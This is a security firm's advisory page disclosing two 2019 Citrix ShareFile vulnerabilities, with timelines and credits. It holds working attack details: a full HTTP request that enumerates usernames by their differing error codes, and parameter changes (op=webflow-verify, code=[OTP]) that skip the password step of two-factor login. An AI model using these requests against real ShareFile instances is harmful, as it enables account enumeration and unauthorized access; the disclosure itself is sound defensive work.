Research and Development
Our CVEs
CVE 2019-7217 : Citrix ShareFile User Enumeration
SummaryIt is possible to enumerate application username based on different server responses using the request to check the otp code.
No authentication is required.
Tested Versions
Citrix ShareFile through 19.1
Product URLs
https://www.sharefile.com/
Details
It is possible to enumerate application username based on different server responses using the request to check the otp code.
No authentication is required.
Example: It is possible to enumerate application username based on different server responses using the request to check the otp code without user authentication: Request: POST /oauth/oauthapi.aspx HTTP/1.1 Host: xxx.sharefile.eu User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://xxx.sharefile.eu/Authentication/Login Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 293 Connection: close tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx& response_type=code&client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6& state=FxwxORudhXUqUh3phnC6Mg%3D%3D& redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin& h=&requireV3=false&code=123 Response if username is not correct: {"error":true,"errorMessage":"You are not authorized to use this client","errorCode":126} Response if username is correct: {"error":true,"errorMessage":"Unable to verify two factor code.","errorCode":122}
Timeline
22-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release
CREDIT
Discovered by Armando Huesca and Andrea Pessione of SKIT (Shorr Kan IT Engineering srl)
CVE 2019-7218 : Citrix ShareFile TWO FACTOR AUTHENTICATION DOWNGRADE TO ONE FACTOR
SummaryAn attacker with access to the offline victim’s otp physical token or virtual app (like google authenticator) is able to bypass the first authentication phase (username/password mechanism) and log-in using username/otp combination only (phase 2 of 2FA).
Tested Versions
Citrix ShareFile through 19.1
Product URLs
https://www.sharefile.com/
Details
An attacker with access to the offline victim’s otp physical token or virtual app (like google authenticator) is able to bypass the first authentication phase (username/password mechanism) and log-in using username/otp combination only (phase 2 of 2FA).
This way, it is possible to downgrade 2FA to 1FA, without knowing the victim’s password.
In order to exploit this vulnerability, attackers should have access to the offline otp token (physical or virtual): it is not possible to gain access if the otp is generated after the phase 1 authentication and sent to the client via SMS or phone call.
This vulnerability takes place because the server does not control that client’s phase 1 authentication succeeded before validating phase 2 authentication (authentication schema).
Example: An attacker is able to intercept the log-in request with garbage data and use this request as base for the attack, changing the op and password parameters as follows: Figure 1 - phase 1 default log-in request and response
- change op=webflow-auth with op=webflow-verify - change password=* with code=[OTP] In case that the username/otp combination is correct (phase 2 succeeded), phase 1 authentication is bypassed and unauthorized access to the application is gained by the attacker as shown below: Figure 2 - evil phase 2 request with modified parameters
Follows the proof of unathorized access to the web application by exploiting this vulnerability. Figure 3 - Unauthorized access to the application
ADVICE: Make sure that client’s phase 1 authentication succeeded before validating phase 2 authentication.
Timeline
28-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release
CREDIT
Discovered by Andrea Pessione and Armando Huesca of SKIT (Shorr Kan IT Engineering srl)
New CVEs in the next episode ...
